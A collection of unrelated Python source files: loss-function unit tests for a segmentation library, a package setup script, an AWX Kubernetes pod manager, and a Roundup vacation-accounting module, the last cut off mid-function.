y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_dice_score(y_pred, y_true, eps=eps)
assert float(actual) == pytest.approx(expected, eps)
@pytest.mark.parametrize(
["y_true", "y_pred", "expected", "eps", "alpha", "beta"],
[
[[1, 1, 1, 1], [1, 1, 1, 1], 1.0, 1e-5, 0.5, 0.5],
[[0, 1, 1, 0], [0, 1, 1, 0], 1.0, 1e-5, 0.5, 0.5],
[[1, 1, 1, 1], [1, 1, 0, 0], 2.0 / 3.0, 1e-5, 0.5, 0.5],
],
)
def test_soft_tversky_score(y_true, y_pred, expected, eps, alpha, beta):
y_true = torch.tensor(y_true, dtype=torch.float32)
y_pred = torch.tensor(y_pred, dtype=torch.float32)
actual = F.soft_tversky_score(y_pred, y_true, eps=eps, alpha=alpha, beta=beta)
assert float(actual) == pytest.approx(expected, eps)
@torch.no_grad()
def test_dice_loss_binary():
eps = 1e-5
criterion = DiceLoss(mode=smp.losses.BINARY_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 1, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
@torch.no_grad()
def test_tversky_loss_binary():
eps = 1e-5
# with alpha=0.5; beta=0.5 it is equal to DiceLoss
criterion = TverskyLoss(mode=smp.losses.BINARY_MODE, from_logits=False, alpha=0.5, beta=0.5)
# Ideal case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 1, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
@torch.no_grad()
def test_binary_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.BINARY_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([1.0]).view(1, 1, 1, 1)
y_true = torch.tensor(([1])).view(1, 1, 1, 1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([1, 0, 1])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, 1, -1)
y_true = torch.tensor(([0, 0, 0])).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([1.0, 1.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 0, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
y_pred = torch.tensor([1.0, 0.0, 1.0]).view(1, 1, -1)
y_true = torch.tensor([0, 1, 0]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, eps)
y_pred = torch.tensor([0.0, 0.0, 0.0]).view(1, 1, -1)
y_true = torch.tensor([1, 1, 1]).view(1, 1, 1, -1)
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, eps)
@torch.no_grad()
def test_multiclass_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.MULTICLASS_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[0, 0, 1, 1]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[1, 1, 0, 0]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
# 1 - 1/3 case
y_pred = torch.tensor([[[1.0, 0.0, 1.0, 0.0], [0.0, 1.0, 0.0, 1.0]]])
y_true = torch.tensor([[1, 1, 0, 0]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0 - 1.0 / 3.0, abs=eps)
@torch.no_grad()
def test_multilabel_jaccard_loss():
eps = 1e-5
criterion = JaccardLoss(mode=smp.losses.MULTILABEL_MODE, from_logits=False)
# Ideal case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(0.0, abs=eps)
# Worst case
y_pred = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [0.0, 0.0, 1.0, 1.0]]])
y_true = 1 - y_pred
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0, abs=eps)
# 1 - 1/3 case
y_pred = torch.tensor([[[0.0, 1.0, 1.0, 0.0], [0.0, 1.0, 1.0, 0.0]]])
y_true = torch.tensor([[[1.0, 1.0, 0.0, 0.0], [1.0, 1.0, 0.0, 0.0]]])
loss = criterion(y_pred, y_true)
assert float(loss) == pytest.approx(1.0 - 1.0 / 3.0, abs=eps)
@torch.no_grad()
def test_soft_ce_loss():
criterion = SoftCrossEntropyLoss(smooth_factor=0.1, ignore_index=-100)
# Ideal case
y_pred = torch.tensor([[+9, -9, -9, -9], [-9, +9, -9, -9], [-9, -9, +9, -9], [-9, -9, -9, +9]]).float()
y_true = torch.tensor([0, 1, -100, 3]).long()
loss = criterion(y_pred, y_true)
print(loss)
@torch.no_grad()
def test_soft_bce_loss():
criterion = SoftBCEWithLogitsLoss(smooth_factor=0.1, ignore_index=-100)
# Ideal case
y_pred = torch.tensor([-9, 9, 1, 9, -9]).float()
y_true = torch.tensor([0, 1, -100, 1, 0]).long()
loss = criterion(y_pred, y_true)
print(loss)
|
from setuptools import setup, find_packages
packages_ = find_packages()
packages = [p for p in packages_ if not(p == 'tests')]
setup(name='microgridRLsimulator',
version='',
description='',
url='',
author='',
author_email='',
license='',
packages=packages,
install_requires=[
'python-dateutil', 'docopt==0.6.2', 'matplotlib==3.0.2', 'numpy==1.15.4',
'pandas==0.23.4', 'scipy==1.1.0', 'tensorflow==1.12.0', 'tflearn==0.3.2', 'sphinx'
],
zip_safe=False)
|
import collections
import logging
from base64 import b64encode
from django.conf import settings
from kubernetes import client, config
from django.utils.functional import cached_property
from awx.main.utils.common import parse_yaml_or_json
from awx.main.utils.execution_environments import get_default_pod_spec
logger = logging.getLogger('awx.main.scheduler')
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
class PodManager(object):
def __init__(self, task=None):
self.task = task
@classmethod
def list_active_jobs(self, instance_group):
task = collections.namedtuple('Task', 'id instance_group')(id='', instance_group=instance_group)
pm = PodManager(task)
pods = {}
try:
for pod in pm.kube_api.list_namespaced_pod(pm.namespace, label_selector='ansible-awx={}'.format(settings.INSTALL_UUID)).to_dict().get('items', []):
job = pod['metadata'].get('labels', {}).get('ansible-awx-job-id')
if job:
try:
pods[int(job)] = pod['metadata']['name']
except ValueError:
pass
except Exception:
logger.exception('Failed to list pods for container group {}'.format(instance_group))
return pods
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def credential(self):
return self.task.instance_group.credential
@cached_property
def kube_config(self):
return generate_tmp_kube_config(self.credential, self.namespace)
@cached_property
def kube_api(self):
# this feels a little janky, but it's what k8s' own code does
# internally when it reads kube config files from disk:
# https://github.com/kubernetes-client/python-base/blob/0b208334ef0247aad9afcaae8003954423b61a0d/config/kube_config.py#L643
if self.credential:
loader = config.kube_config.KubeConfigLoader(config_dict=self.kube_config)
cfg = type.__call__(client.Configuration)
loader.load_and_set(cfg)
api = client.CoreV1Api(api_client=client.ApiClient(configuration=cfg))
else:
config.load_incluster_config()
api = client.CoreV1Api()
return api
@property
def pod_name(self):
return f"automation-job-{self.task.id}"
@property
def pod_definition(self):
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}), dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.id)})
)
pod_spec['spec']['containers'][0]['name'] = self.pod_name
return pod_spec
def generate_tmp_kube_config(credential, namespace):
host_input = credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": namespace}}],
"current-context": host_input,
}
if credential.get_input('verify_ssl') and 'ssl_ca_cert' in credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
#! /usr/bin/python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2014 Dr. Ralf Schlatterbeck Open Source Consulting.
# Reichergasse 131, A-3411 Weidling.
# Web: http://www.runtux.com Email: office@runtux.com
# All rights reserved
# ****************************************************************************
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
# ****************************************************************************
#
#++
# Name
# vacation
#
# Purpose
# Vacation-related routines
#--
#
from math import ceil
from roundup.date import Date, Interval
from freeze import freeze_date
import common
import user_dynamic
def public_holiday_wp (db, user, date) :
""" Get first public holiday wp for this user on date.
Should typically be only one, we use the first in the list
without further checks.
"""
opn = db.time_project_status.lookup ('Open')
prj = db.time_project.filter \
(None, dict (is_public_holiday = True, status = opn))
if not prj :
return None
wps = \
( db.time_wp.filter \
(None, dict (project = prj, is_public = True))
+ db.time_wp.filter \
(None, dict (project = prj, bookers = user))
)
for wpid in wps :
w = db.time_wp.getnode (wpid)
if ( w.time_start <= date
and (not w.time_end or date < w.time_end)
) :
return wpid
# end def public_holiday_wp
def try_create_public_holiday (db, daily_record, date, user) :
st_open = db.daily_record_status.lookup ('open')
wp = public_holiday_wp (db, user, date)
# Don't change anything if status not open
if db.daily_record.get (daily_record, 'status') != st_open :
return
# Only perform public holiday processing if user has a public
# holiday wp to book on.
if not wp :
return
dyn = user_dynamic.get_user_dynamic (db, user, date)
wh = user_dynamic.day_work_hours (dyn, date)
if wh :
loc = db.org_location.get (dyn.org_location, 'location')
hol = db.public_holiday.filter \
( None
, { 'date' : common.pretty_range (date, date)
, 'locations' : loc
}
)
if hol and wh :
holiday = db.public_holiday.getnode (hol [0])
if holiday.is_half :
wh = wh / 2.
wh = user_dynamic.round_daily_work_hours (wh)
# Check if there already is a public-holiday time_record
# Update duration (and wp) if wrong
trs = db.time_record.filter \
(None, dict (daily_record = daily_record))
for trid in trs :
tr = db.time_record.getnode (trid)
if tr.wp is None :
continue
tp = db.time_project.getnode \
(db.time_wp.get (tr.wp, 'project'))
if tp.is_public_holiday :
d = {}
if tr.duration != wh :
d ['duration'] = wh
if tr.wp != wp :
d ['wp'] = wp
if d :
db.time_record.set (trid, ** d)
return
comment = holiday.name
if holiday.description :
comment = '\n'.join ((holiday.name, holiday.description))
db.time_record.create \
( daily_record = daily_record
, duration = wh
, wp = wp
, comment = comment
, work_location = db.work_location.lookup ('off')
)
# end def try_create_public_holiday
def create_daily_recs (db, user, first_day, last_day) :
d = first_day
while d <= last_day :
pr = common.pretty_range (d, d)
x = db.daily_record.filter (None, dict (user = user, date = pr))
if x :
assert len (x) == 1
x = x [0]
else :
dyn = user_dynamic.get_user_dynamic (db, user, d)
if not dyn :
d += common.day
continue
x = db.daily_record.create \
( user = user
, date = d
, weekend_allowed = False
, required_overtime = False
)
try_create_public_holiday (db, x, d, user)
d += common.day
# end def create_daily_recs
def leave_submissions_on_date (db, user, date, filter = None) :
""" Return all leave records that overlap with the given date.
Optionally restrict search if filter is specified.
"""
dts = ';%s' % date.pretty (common.ymd)
dte = '%s;' % date.pretty (common.ymd)
d = dict (user = user, first_day = dts, last_day = dte)
if filter :
d.update (filter)
vs = db.leave_submission.filter (None, d)
return [db.leave_submission.getnode (v) for v in vs]
# end def leave_submissions_on_date
def leave_days (db, user, first_day, last_day) :
d = first_day
s = 0.0
while d <= last_day :
dyn = user_dynamic.get_user_dynamic (db, user, d)
if not dyn :
d += common.day
continue
wh = user_dynamic.day_work_hours (dyn, d)
ld = leave_duration (db, user, d)
if ld != 0 :
s += ceil (ld / wh * 2) / 2.
d += common.day
return s
# end def leave_days
def leave_duration (db, user, date, ignore_public_holiday = False) :
""" Duration of leave on a single day to be booked. """
dyn = user_dynamic.get_user_dynamic (db, user, date)
wh = user_dynamic.day_work_hours (dyn, date)
if not wh :
return 0.0
dt = common.pretty_range (date, date)
dr = db.daily_record.filter (None, dict (user = user, date = dt))
assert len (dr) == 1
try_create_public_holiday (db, dr [0], date, user)
trs = db.time_record.filter (None, dict (daily_record = dr [0]))
bk = 0.0
if not ignore_public_holiday :
for trid in trs :
tr = db.time_record.getnode (trid)
if not tr.wp :
continue
wp = db.time_wp.getnode (tr.wp)
tp = db.time_project.getnode (wp.project)
if tp.is_public_holiday :
bk += tr.duration
assert bk <= wh
return wh - bk
# end def leave_duration
def leave_submission_days (db, user, ctype, start, end, type, * stati) :
""" Sum leave submissions of the given type
with the given status in the given time range for the given user
and ctype (contract_type).
"""
assert start <= end
dt = common.pretty_range (start, end)
dts = ';%s' % start.pretty (common.ymd)
dte = '%s;' % end.pretty (common.ymd)
if type == 'vacation' :
lwp = vacation_wps (db)
elif type == 'flexi' :
lwp = flexi_wps (db)
else :
lwp = special_wps (db)
d = dict (user = user, status = list (stati), time_wp = lwp)
d1 = dict (d, first_day = dt)
vs1 = db.leave_submission.filter (None, d1)
d2 = dict (d, last_day = dt)
vs2 = db.leave_submission.filter (None, d2)
d3 = dict (d, first_day = dts, last_day = dte)
vs3 = db.leave_submission.filter (None, d3)
vss = dict.fromkeys (vs1 + vs2 + vs3).keys ()
vss = [db.leave_submission.getnode (i) for i in vss]
days = 0.0
for vs in vss :
first_day = vs.first_day
last_day = vs.last_day
dyn = user_dynamic.get_user_dynamic (db, user, first_day)
if not dyn :
continue
if dyn.contract_type != ctype :
continue
if first_day < start :
assert vs.last_day >= start
first_day = start
if last_day > end :
assert vs.first_day <= end
last_day = end
days += leave_days (db, user, first_day, last_day)
return days
# end def leave_submission_days
def vacation_submission_days (db, user, ctype, start, end, * stati) :
""" Sum vacation submissions with the given status in the given time
range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'vacation', * stati)
# end def vacation_submission_days
def flexitime_submission_days (db, user, ctype, start, end, * stati) :
""" Sum flexitime submissions with the given status in the given time
range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'flexi', * stati)
# end def flexitime_submission_days
def special_submission_days (db, user, ctype, start, end, * stati) :
""" Sum special_leave submissions with the given status in the given
time range for the given user and ctype (contract_type).
"""
return leave_submission_days \
(db, user, ctype, start, end, 'special', * stati)
# end def special_submission_days
def next_yearly_vacation_date (db, user, ctype, date) :
d = date + common.day
dyn = vac_get_user_dynamic (db, user, ctype, d)
if not dyn or dyn.vacation_month is None or dyn.vacation_day is None :
assert 0
return None
y = int (d.get_tuple () [0])
next_date = Date \
('%04d-%02d-%02d' % (y, dyn.vacation_month, dyn.vacation_day))
if next_date < d :
next_date = Date \
('%04d-%02d-%02d' % (y + 1, dyn.vacation_month, dyn.vacation_day))
# Found a dyn user record too far in the future, can't determine
# next yearly vacation date
if dyn.valid_from > next_date :
# Hmmm, maybe started this year?
# Or re-started after some years?
prev = user_dynamic.prev_user_dynamic (db, dyn, use_ct = True)
if not prev or prev.valid_to < next_date :
return dyn.valid_from
return None
while dyn.valid_from <= next_date :
if dyn.valid_to > next_date :
# valid dyn record
return next_date
ndyn = vac_next_user_dynamic (db, dyn)
if ( not ndyn
or ndyn.valid_from > next_date
or ndyn.contract_type != ctype
) :
# use last dyn record, no next or too far in the future
return next_date
dyn = ndyn
yday = dyn.vacation_day
ymon = dyn.vacation_month
if yday is None or ymon is None :
return next_date
next_date = Date ('%04d-%02d-%02d' % (y, ymon, yday))
if next_date < d :
next_date = Date ('%04d-%02d-%02d' % (y + 1, ymon, yday))
# end def next_yearly_vacation_date
def prev_yearly_vacation_date (db, user, ctype, date) :
d = date - common.day
dyn = vac_get_user_dynamic (db, user, ctype, d)
if ( not dyn
or dyn.valid_from > d
or dyn.vacation_month is None
or dyn.vacation_day is None
) :
return None
y = int (d.get_tuple () [0])
prev_date = Date \
('%04d-%02d-%02d' % (y, dyn.vacation_month, dyn.vacation_day))
if prev_date >= date :
prev_date = Date \
('%04d-%02d-%02d' % (y - 1, dyn.vacation_month, dyn.vacation_day))
assert prev_date < date
while dyn.valid_from > prev_date :
dyn = vac_prev_user_dynamic (db, dyn)
if not dyn :
return prev_date
yday = dyn.vacation_day
ymon = dyn.vacation_month
if yday is None or ymon is None :
return prev_date
prev_date = Date ('%04d-%02d-%02d' % (y, ymon, yday))
if prev_date >= date :
prev_date = Date ('%04d-%02d-%02d' % (y - 1, ymon, yday))
return prev_date
# end def prev_yearly_vacation_date
def interval_days (iv) :
""" Compute number of days in a roundup.date Interval. The
difference should be computed from two dates (without time)
>>> D = Date
>>> I = Interval
>>> interval_days (D ('2014-01-07') - D ('2013-01-07'))
365
>>> interval_days (D ('2014-01-07') - D ('2012-01-07'))
731
>>> interval_days (I ('23d'))
23
>>> interval_days (I ('-23d'))
-23
>>> interval_days (D ('2012-01-07') - D ('2014-01-07'))
-731
"""
t = iv.get_tuple ()
assert abs (t [0]) == 1
assert t [1] == 0
assert t [2] == 0
return t [3] * t [0]
# end def interval_days
def get_vacation_correction (db, user, ctype = -1, date = None) :
""" Get latest absolute vacation_correction.
Special handling of ctype: None means ctype 'None' while -1
means "don't care, search for *any* ctype". Note that roundups
interface for searching specifies -1 when searching for an
empty link....
"""
if date is None :
date = Date ('.')
dt = ";%s" % date.pretty (common.ymd)
d = dict \
( user = user
, absolute = True
, date = dt
)
# If no ctype given, try to get dyn. user record on date and use
# ctype from there. If not found we simply search for the latest
# vacation correction before date.
if ctype == -1 :
dyn = user_dynamic.get_user_dynamic (db, user, date)
if dyn :
ctype = dyn.contract_type
if ctype != -1 :
d ['contract_type'] = ctype
if ctype is None :
d ['contract_type'] = '-1' # roundup: -1 means search empty
vcs = db.vacation_correction.filter (None, d, sort = [('-', 'date')])
if not vcs :
return
for id in vcs :
vc = db.vacation_correction.getnode (id)
if ctype == -1 or vc.contract_type == ctype :
return vc
# end def get_vacation_correction
def vacation_wps (db) :
# All time recs with vacation wp in range
vtp = db.time_project.filter (None, dict (is_vacation = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def vacation_wps
def special_wps (db) :
# All time recs with special-leave wp in range
vtp = db.time_project.filter (None, dict (is_special_leave = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def vacation_wps
def flexi_wps (db) :
# All time recs with flexitime wp in range
vtp = db.time_project.filter \
(None, dict (max_hours = 0, approval_required = True))
if not vtp :
return []
vwp = db.time_wp.filter (None, dict (project = vtp))
return vwp
# end def flexi_wps
def vacation_time_sum (db, user, ctype, start, end) :
dt = common.pretty_range (start, end)
dr = db.daily_record.filter (None, dict (user = user, date = dt))
dtt = [('+', 'daily_record.date')]
vwp = vacation_wps (db)
trs = db.time_record.filter \
(None, dict (daily_record = dr, wp = vwp), sort = dtt)
vac = 0.0
if ctype == -1 :
ctype = _get_ctype (db, user, Date ('.'))
by_dr = {}
for tid in trs :
tr = db.time_record.getnode (tid)
dr = db.daily_record.getnode (tr.daily_record)
dyn = user_dynamic.get_user_dynamic (db, user, dr.date)
# dyn is None if time_records booked but dyn record revoked for this period:
if not dyn or dyn.contract_type != ctype :
continue
wh = user_dynamic.day_work_hours (dyn, dr.date)
assert wh
if dr.id not in by_dr :
by_dr [dr.id] = (wh, [])
assert by_dr [dr.id][0] == wh
by_dr [dr.id][1].append (tr.duration)
for wh, durs in by_dr.itervalues () :
vac += ceil (sum (durs) / wh * 2) / 2.
return vac
# end def vacation_time_sum
def _get_ctype (db, user, date) :
# None is a valide contract_type, return -1 in case of error
dyn = user_dynamic.get_user_dynamic (db, user, date)
if not dyn :
dyn = user_dynamic.last_user_dynamic (db, user, date)
if not dyn :
return -1
return dyn.contract_type
# end def _get_ctype
def remaining_vacation \
(db, user, ctype = -1, date = None, cons = None, to_eoy = True) :
""" Compute remaining vacation on the given date
"""
if date is None :
date = Date ('.')
pdate = date.pretty (common.ymd)
if ctype == -1 :
ctype = _get_ctype (db, user, date)
if ctype == -1 :
return
vac = None
try :
vac = db.rem_vac_cache.get ((user, ctype, pdate, to_eoy))
except AttributeError :
def vac_clear_cache (db) :
db.rem_vac_cache = {}
db.registerClearCacheCallback (vac_clear_cache, db)
db.rem_vac_cache = {}
if vac is not None :
return vac
vc = get_vacation_correction (db, user, ctype, date)
if not vc :
return
ed = next_yearly_vacation_date (db, user, ctype, date)
if not to_eoy :
ed = min (ed, date)
if cons is None :
cons = consolidated_vacation (db, user, ctype, date, vc, to_eoy)
vac = cons
vac -= vacation_time_sum (db, user, ctype, vc.date, ed)
# All vacation_correction records up to date but starting with one
# day later (otherwise we'll find the absolute correction)
# Also one day *earlier* than ed for the same reason.
dt = common.pretty_range (vc.date + common.day, ed - common.day)
d = dict (user = user, date = dt)
if ctype is not None :
d ['contract_type'] = ctype
ds = [('+', 'date')]
vcs = db.vacation_correction.filter (None, d, sort = ds)
for vcid in vcs :
vc = db.vacation_correction.getnode (vcid)
if vc.contract_type != ctype :
continue
assert not vc.absolute
vac += vc.days
db.rem_vac_cache [(user, ctype, pdate, to_eoy)] = vac
return vac
# end def remaining_vacation
def month_diff (d1, d2) :
""" Difference of two month which may be in suceeding years
>>> month_diff (Date ('2018-01-02'), Date ('2018-12-01'))
11
>>> month_diff (Date ('2018-12-01'), Date ('2019-01-01'))
1
>>> month_diff (Date ('2018-12-12'), Date ('2019-12-11'))
12
>>> month_diff (Date ('2018-12-12'), Date ('2019-12-12'))
12
"""
yd = d2.year - d1.year
md = d2.month - d1.month
return md + 12 * yd
# end def month_diff
def consolidated_vacation \
(db, user, ctype = -1, date = None, vc = None, to_eoy = True) :
""" Compute remaining vacation on the given date
"""
if date is None :
date = Date ('.')
if ctype == -1 :
ctype = _get_ctype (db, user, date)
if ctype == -1 :
return
vc = vc or get_vacation_correction (db, user, ctype, date)
if not vc :
return None
ed = next_yearly_vacation_date (db, user, ctype, date)
if not to_eoy :
ed = min (ed, date + common.day)
d = vc.date
dyn = vac_get_user_dynamic (db, user, ctype, d)
while dyn and dyn.valid_to and dyn.valid_to <= d :
dyn = vac_next_user_dynamic (db, dyn)
if dyn is None :
return None
vac = float (vc.days)
msg = "vac_aliq None for user_dynamic%s" % dyn.id
assert dyn.vac_aliq, msg
va = db.vac_aliq.getnode (dyn.vac_aliq)
assert va.name in ('Daily', 'Monthly')
# Need to skip first period without a dyn user record
# sd is the current start date for german aliquotation
# We subtract 1 day to easily compare the day of the ending-date
# with the day of the start date
sd = d
# This is used for corrections if the start day lies beyond 28 -- in
# that case there are months that simply don't have that date. So we
# must correct for this in months with less days.
sd_day = 0
if dyn.valid_from > d :
sd = d = dyn.valid_from
while dyn and d < ed :
if dyn.valid_from > d :
# We want to check if the days that are lost here whenever a
# jump in dyn user records occurs are OK for monthly aliqotation
sd = d = dyn.valid_from
continue
assert not dyn.valid_to or dyn.valid_to > d
eoy = Date ('%s-12-31' % d.year)
msg = "vacation_yearly None for user_dynamic%s" % dyn.id
assert dyn.vacation_yearly is not None, msg
msg = ( "vac_aliq changes w/o absolute vac_corr for user_dynamic%s"
% dyn.id
)
assert dyn.vac_aliq == va.id, msg
if dyn.valid_to and dyn.valid_to <= ed and dyn.valid_to < eoy :
if va.name == 'Daily' :
yd = float (common.ydays (dyn.valid_to))
vac += interval_days \
(dyn.valid_to - d) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, dyn.valid_to)
dy = sd_day or sd.day
if dyn.valid_to.day < dy :
md -= 1
# Example: sd = 2018-04-03 valid_to = 2018-06-01
# Need to set sd=2018-05-03, i.e. the next start
# day before valid_to
# Even more complex is the case where e.g.
# sd = 2018-03-31 valid_to = 2018-05-01
# We set sd=2018-04-30 and sd_day=31
# Get last day of last month
lm = dyn.valid_to - Interval ('%sd' % dyn.valid_to.day)
em = common.end_of_month (lm)
if dy > em.day :
sd_day = sd.day
sd = em
else :
sd = Date (lm.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
else :
sd = Date (dyn.valid_to.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
d = dyn.valid_to
vac += dyn.vacation_yearly * md / 12.0
dyn = vac_next_user_dynamic (db, dyn)
elif eoy < ed :
if va.name == 'Daily' :
yd = float (common.ydays (eoy))
iv = eoy + common.day - d
vac += interval_days (iv) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, eoy)
dy = sd_day or sd.day
assert eoy.day >= dy
if dy == 1 :
md += 1
sd = eoy + common.day
else :
sd = Date (eoy.pretty ("%%Y-%%m-%s" % sd.day))
sd_day = 0
vac += dyn.vacation_yearly * md / 12.0
d = eoy + common.day
if dyn.valid_to == d :
dyn = vac_next_user_dynamic (db, dyn)
else :
if va.name == 'Daily' :
yd = float (common.ydays (ed - common.day))
vac += interval_days (ed - d) * dyn.vacation_yearly / yd
else :
md = month_diff (sd, ed)
dy = sd_day or sd.day
if ed.day < dy :
md -= 1
sd = ed
vac += dyn.vacation_yearly * md / 12.0
d = ed
return vac
# end def consolidated_vacation
def valid_wps \
(db, filter = {}, user = None, date = None, srt = None, future = False) :
srt = srt or [('+', 'id')]
wps = {}
date = date or Date ('.')
dt = (date + common.day).pretty (common.ymd)
d = {}
if not future :
d ['time_start'] = ';%s' % date.pretty (common.ymd)
# Only select WPs that are not exclusively managed by external tool
d ['is_extern'] = False
d ['project.is_extern'] = False
d.update (filter)
wp = []
if user :
d1 = dict (d, is_public = True, has_expiration_date = False)
wp.extend (db.time_wp.filter (None, d1, srt))
d1 = dict (d, is_public = True, time_end = '%s;' % dt)
